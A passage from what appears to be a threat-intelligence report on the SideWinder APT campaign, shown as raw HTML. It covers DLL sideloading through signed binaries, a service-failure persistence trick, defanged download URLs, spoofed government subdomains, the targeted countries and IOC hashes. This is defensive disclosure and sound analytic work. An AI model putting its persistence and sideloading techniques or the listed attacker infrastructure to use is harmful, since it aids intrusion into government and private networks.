line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e4a225850676-1"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E</span></div><div class="crayon-line crayon-striped-line" id="crayon-67446d0bc5e4a225850676-2"><span class="crayon-i">F0mo673</span>/<span class="crayon-cn">1</span>/<span class="crayon-cn">1706084656128</span>/<span class="crayon-i">x3l8o</span>/<span class="crayon-cn">2c821e</span></div></div></td> </tr> </table> </div> </div><p> The specific file to be downloaded is requested with a variable &#8220;name&#8221;, which is included in all GET requests. 
Each file is downloaded to a specific location:</p> <table width="100%"> <tbody> <tr> <td width="30%"><strong>Variable</strong></td> <td width="70%"><strong>Destination file path</strong></td> </tr> <tr> <td>?name=bp</td> <td>%systemroot%\srclinks\%RANDOM_NAME%<br /> Example name: VacPWtys</td> </tr> <tr> <td>?name=ps</td> <td>%systemroot%\srclinks\write.exe<br /> or<br /> %systemroot%\srclinks\fsquirt.exe</td> </tr> <tr> <td>?name=dj</td> <td>%systemroot%\srclinks\devobj.dll<br /> or<br /> %systemroot%\srclinks\propsys.dll</td> </tr> <tr> <td>?name=v3d</td> <td>%systemroot%\srclinks\vm3dservice.exe</td> </tr> <tr> <td>?name=svh</td> <td>%systemroot%\srclinks\winmm.dll</td> </tr> <tr> <td>?name=fsq</td> <td>%systemroot%\srclinks\write.exe<br /> or<br /> %systemroot%\srclinks\fsquirt.exe</td> </tr> </tbody> </table> <p>The specific filename changes according to the Windows version.</p> <p>If the Windows build is lower than 10240 (Windows 10 build 10240), the malware installs the following files:</p> <ul> <li>%systemroot%\srclinks\write.exe</li> <li>%systemroot%\srclinks\propsys.dll</li> <li>%systemroot%\srclinks\write.exe.config</li> <li>%systemroot%\srclinks\vm3dservice.exe</li> <li>%systemroot%\srclinks\winmm.dll</li> </ul> <p>Otherwise:</p> <ul> <li>%systemroot%\srclinks\fsquirt.exe</li> <li>%systemroot%\srclinks\devobj.dll</li> <li>%systemroot%\srclinks\fsquirt.exe.config</li> <li>%systemroot%\srclinks\vm3dservice.exe</li> <li>%systemroot%\srclinks\winmm.dll</li> </ul> <p>The malware also creates a new Windows service named <span id="crayon-67446d0bc5e4c873662437" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span 
class="crayon-s">"srclink"</span></span></span> to ensure that the downloaded files can start automatically when the system restarts.</p> <p>The service is configured to start automatically and run the following program:</p> <div id="crayon-67446d0bc5e4f382077549" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> C:\WINDOWS\srclinks\vm3dservice.exe</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr 
class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e4f382077549-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e4f382077549-1"><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">WINDOWS</span><span class="crayon-sy">\</span><span class="crayon-i">srclinks</span><span class="crayon-sy">\</span><span class="crayon-i">vm3dservice</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span></div></div></td> </tr> </table> </div> </div><p> The file is a legitimate program digitally signed by VMware and is used by the attacker to sideload the malicious <span id="crayon-67446d0bc5e51898596634" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"winmm.dll"</span></span></span> library.</p> <p>This is a library developed in C++ and named <span id="crayon-67446d0bc5e53357140795" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span 
class="crayon-s">"SyncBotServiceHijack.dll"</span></span></span> that exports all the functions normally exported by the legitimate &#8220;winmm.dll&#8221; library located in the system32 directory.</p> <p>All the functions point to a function that sleeps for 10 seconds and then raises a signal error and terminates execution.</p> <div id="attachment_114143" style="width: 337px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154911/SideWinder_2024_17.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114143" class="size-full wp-image-114143" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154911/SideWinder_2024_17.png" alt="Instructions used to raise an error" width="327" height="71" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154911/SideWinder_2024_17.png 327w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154911/SideWinder_2024_17-300x65.png 300w" sizes="(max-width: 327px) 100vw, 327px" /></a><p id="caption-attachment-114143" class="wp-caption-text">Instructions used to raise an error</p></div> <p>This is part of the persistence mechanism created by the attacker. 
The malicious Windows service created by the InstallerPayload component is configured to launch another program if the service fails.</p> <div id="attachment_114144" style="width: 422px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114144" class="size-full wp-image-114144" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18.png" alt="Windows service properties" width="412" height="475" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18.png 412w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18-260x300.png 260w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18-304x350.png 304w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18-243x280.png 243w" sizes="(max-width: 412px) 100vw, 412px" /></a><p id="caption-attachment-114144" class="wp-caption-text">Windows service properties</p></div> <p>We may presume that the attacker uses this trick to bypass detection and sandbox technologies.</p> <p>In this case, the service starts another program previously dropped by the malware:</p> <div id="crayon-67446d0bc5e55171623198" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px 
!important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> %systemroot%\srclinks\fsquirt.exe</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e55171623198-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e55171623198-1"><span class="crayon-sy">%</span><span class="crayon-i">systemroot</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">srclinks</span><span class="crayon-sy">\</span><span class="crayon-i">fsquirt</span><span 
class="crayon-sy">.</span><span class="crayon-i">exe</span></div></div></td> </tr> </table> </div> </div><p> This is a legitimate Windows utility that provides the default GUI used by the Bluetooth File Transfer Wizard. This utility is used by the attacker to sideload another malicious library, <span id="crayon-67446d0bc5e57452802632" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"devobj.dll"</span></span></span>, which is a variant of the Backdoor loader module.</p> <h5 id="installerpayload_net">InstallerPayload_NET</h5> <p>This is another .NET library, which performs similar actions to the previously described InstallerPayload developed in C++. 
The main difference is that this malware embeds most of the files as resources.</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Library</strong></td> <td width="40%"><strong>Hash</strong></td> <td width="35%"><strong>Description</strong></td> </tr> <tr> <td>devobjLoadAppDllx32</td> <td>a7aad43a572f44f8c008b9885cf936cf</td> <td>&#8220;Backdoor loader module&#8221; dropped as devobj.dll</td> </tr> <tr> <td>fsquirt</td> <td>ba54013cad72cd79d2b7843602835ed3</td> <td>Legitimate program signed by Microsoft</td> </tr> <tr> <td>Manage</td> <td>f840c721e533c05d152d2bc7bf1bc165</td> <td>Program to hijack Windows service</td> </tr> <tr> <td>manifest</td> <td>d3136d7151f60ec41a370f4743c2983b</td> <td>XML manifest</td> </tr> <tr> <td>propsysLoadAppDllx32</td> <td>56e7d6b5c61306096a5ba22ebbfb454e</td> <td>&#8220;Backdoor loader module&#8221; dropped as propsys.dll</td> </tr> </tbody> </table> <p>Similar to <span id="crayon-67446d0bc5e5a768007373" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-i">InstallerPayload</span></span></span>, the malware creates a new service that launches <span id="crayon-67446d0bc5e5b922602825" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-i">Manage</span><span class="crayon-sy">.</span><span 
class="crayon-i">exe</span></span></span>. Manage.exe is a simple program that sleeps for 20 seconds and then generates an exception.</p> <p>The service is configured to launch another program in case of failure. The second program, <span id="crayon-67446d0bc5e5d009481467" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"fsquirt.exe"</span></span></span> or <span id="crayon-67446d0bc5e5f772783168" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"write.exe"</span></span></span>, is a legitimate application that is used to sideload a malicious library, the Backdoor loader module component.</p> <p>The encrypted file to be loaded by the Backdoor loader module component is downloaded from a remote server using a URL embedded in the code:</p> <div id="crayon-67446d0bc5e61295448592" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div 
class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> hxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e61295448592-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e61295448592-1"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572</span></div></div></td> </tr> </table> </div> 
</div><p> The received data are stored in a file with a random name and no extension.</p> <h5 id="infrastructure">Infrastructure</h5> <p>The attacker registered numerous domains using Hostinger, Namecheap, and Hosting Concepts as providers. They typically configure the malware to communicate with FQDNs that use specific subdomains whose names appear legitimate and are probably chosen for their relevance to the target. For example, the following is a small subset of the subdomains used by the attacker.</p> <ul> <li>nextgen[.]paknavy-govpk[.]net</li> <li>premier[.]moittpk[.]org</li> <li>cabinet-division-pk[.]fia-gov[.]com</li> <li>navy-lk[.]direct888[.]net</li> <li>srilanka-navy[.]lforvk[.]com</li> <li>portdjibouti[.]pmd-office[.]org</li> <li>portdedjibouti[.]shipping-policy[.]info</li> <li>mofa-gov-sa[.]direct888[.]net</li> <li>mod-gov-bd[.]direct888[.]net</li> <li>mmcert-org-mm[.]donwloaded[.]com</li> <li>opmcm-gov-np[.]fia-gov[.]net</li> </ul> <p>Each domain and its related subdomains resolve to a dedicated IP address. The C2s are hosted on VPSs used exclusively by the attacker, but rented from different providers for only a very short time. The attacker uses various service providers, but has a preference for HZ Hosting, BlueVPS, and GhostNET.</p> <h4 id="victims">Victims</h4> <p>SideWinder targeted entities in various countries: Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.</p> <p>Targeted sectors include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities and oil trading companies. The attacker also targeted diplomatic entities in the following countries: Afghanistan, France, China, India, Indonesia and Morocco.</p> <h4 id="attribution">Attribution</h4> <p>We attribute these activities to the SideWinder APT group with medium/high confidence. 
The infection chain observed in these attacks is consistent with those observed in the past. Specifically, the following techniques are similar to previous SideWinder activity:</p> <ul> <li>The use of remote template injection, which is abused to download RTF files named &#8220;file.rtf&#8221; and forged to exploit CVE-2017-11882.</li> <li>The naming scheme used for the malicious subdomains, which attempts to resemble legitimate domains that are of significance to the targets.</li> <li>The .NET Downloader component and the Backdoor loader module are similar to those described in the past.</li> <li>Last but not least, most of the entities targeted by the group are similar to those targeted by SideWinder in the past.</li> </ul> <p><em>***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: <a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener">intelreports@kaspersky.com</a>.</em></p> <h2 id="iocs">IOCs</h2> <h3 id="malicious-documents">Malicious documents</h3> <p><a href="https://opentip.kaspersky.com/6cf6d55a3968e2176db2bba2134bbe94/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1d7a67e228f13e8e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6cf6d55a3968e2176db2bba2134bbe94</a><br /> <a href="https://opentip.kaspersky.com/c87eb71ff038df7b517644fa5c097eac/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______377208e93645979f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">c87eb71ff038df7b517644fa5c097eac</a><br /> <a href="https://opentip.kaspersky.com/8202209354ece5c53648c52bdbd064f0/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e5c4b35170f108b7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8202209354ece5c53648c52bdbd064f0</a><br /> <a 
href="https://opentip.kaspersky.com/5cc784afb69c153ab325266e8a7afaf4/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bf5b4fbe61b90fa1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5cc784afb69c153ab325266e8a7afaf4</a><br /> <a href="https://opentip.kaspersky.com/3a6916192106ae3ac7e55bd357bc5eee/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ba26908258f33e50&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3a6916192106ae3ac7e55bd357bc5eee</a><br /> <a href="https://opentip.kaspersky.com/54aadadcf77dec53b2566fe61b034384/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______baa3825053071330&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">54aadadcf77dec53b2566fe61b034384</a><br /> <a href="https://opentip.kaspersky.com/8f83d19c2efc062e8983bce83062c9b6/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2a0f7ca37c3c1eb6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8f83d19c2efc062e8983bce83062c9b6</a><br /> <a href="https://opentip.kaspersky.com/8e8b61e5fb6f6792f2bee0ec947f1989/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______116283d8ffd49271&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8e8b61e5fb6f6792f2bee0ec947f1989</a><br /> <a href="https://opentip.kaspersky.com/86eeb037f5669bff655de1e08199a554/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3743a24f34170eb1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">86eeb037f5669bff655de1e08199a554</a><br /> <a href="https://opentip.kaspersky.com/1c36177ac4423129e301c5a40247f180/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______19d6628dce168526&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
rel="noopener">1c36177ac4423129e301c5a40247f180</a><br /> <a href="https://opentip.kaspersky.com/873079cd3e635adb609c38af71bad702/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______44840314c68f6a69&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">873079cd3e635adb609c38af71bad702</a><br /> <a href="https://opentip.kaspersky.com/423e150d91edc568546f0d2f064a8bf1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8f1eda5668a93cfb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">423e150d91edc568546f0d2f064a8bf1</a><br /> <a href="https://opentip.kaspersky.com/4a5e818178f9b2dc48839a5dbe0e3cc1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______04d4fe74ef8fcfd0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4a5e818178f9b2dc48839a5dbe0e3cc1</a></p> <h3 id="rtf">Rtf</h3> <p><a href="https://opentip.kaspersky.com/26aa30505d8358ebeb5ee15aecb1cbb0/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ef8379cb635e06c0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">26aa30505d8358ebeb5ee15aecb1cbb0</a><br /> <a href="https://opentip.kaspersky.com/3233db78e37302b47436b550a21cdaf9/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0257e263094f9785&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3233db78e37302b47436b550a21cdaf9</a><br /> <a href="https://opentip.kaspersky.com/8d7c43913eba26f96cd656966c1e26d5/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______df34dd0e78633888&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8d7c43913eba26f96cd656966c1e26d5</a><br /> <a 
href="https://opentip.kaspersky.com/d0d1fba6bb7be933889ace0d6955a1d7/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f63ab8f1cf90229a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">d0d1fba6bb7be933889ace0d6955a1d7</a><br /> <a href="https://opentip.kaspersky.com/e706fc65f433e54538a3dbb1c359d75f/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______43510735b44626f2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e706fc65f433e54538a3dbb1c359d75f</a></p> <h3 id="lnk">Lnk</h3> <p><a href="https://opentip.kaspersky.com/412b6ac53aeadb08449e41dccffb1abe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6f49fffd2516b663&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">412b6ac53aeadb08449e41dccffb1abe</a> දින සංශෝධන කර ගැනිම .lnk<br /> <a href="https://opentip.kaspersky.com/2f4ba98dcd45e59fca488f436ab13501/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e890838c62d24b50&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2f4ba98dcd45e59fca488f436ab13501</a> Special Envoy Speech at NCA.jpg .lnk</p> <h3 id="backdoor-loader">Backdoor Loader</h3> <p><strong><em>propsys.dll</em></strong><br /> <a href="https://opentip.kaspersky.com/b69867ee5b9581687cef96e873b775ff/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______75cfc15cca529479&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b69867ee5b9581687cef96e873b775ff</a><br /> <a href="https://opentip.kaspersky.com/c3ce4094b3411060928143f63701aa2e/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______31ff64595bb7d597&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">c3ce4094b3411060928143f63701aa2e</a><br /> <a 
href="https://opentip.kaspersky.com/e1bdfa55227d37a71cdc248dc9512296/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b68d7f50b8c11b86&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e1bdfa55227d37a71cdc248dc9512296</a><br /> <a href="https://opentip.kaspersky.com/ea4b3f023bac3ad1a982cace9a6eafc3/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5f1d6857f0c66f66&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ea4b3f023bac3ad1a982cace9a6eafc3</a><br /> <a href="https://opentip.kaspersky.com/44dbdd87b60c20b22d2a7926ad2d7bea/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1abefcd36295e188&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">44dbdd87b60c20b22d2a7926ad2d7bea</a><br /> <a href="https://opentip.kaspersky.com/7e97cbf25eef7fc79828c033049822af/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______424199986086e9b5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7e97cbf25eef7fc79828c033049822af</a><br /> <strong><em>vsstrace.dll</em></strong><br /> <a href="https://opentip.kaspersky.com/101a63ecdd8c68434c665bf2b1d3ffc7/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fb813317a5253fb0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">101a63ecdd8c68434c665bf2b1d3ffc7</a><br /> <a href="https://opentip.kaspersky.com/d885df399fc9f6c80e2df0c290414c2f/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3b9a5dae0bd7646c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">d885df399fc9f6c80e2df0c290414c2f</a><br /> <a href="https://opentip.kaspersky.com/92dd91a5e3dfb6260e13c8033b729e03/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8bbe4b8351fd8854&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
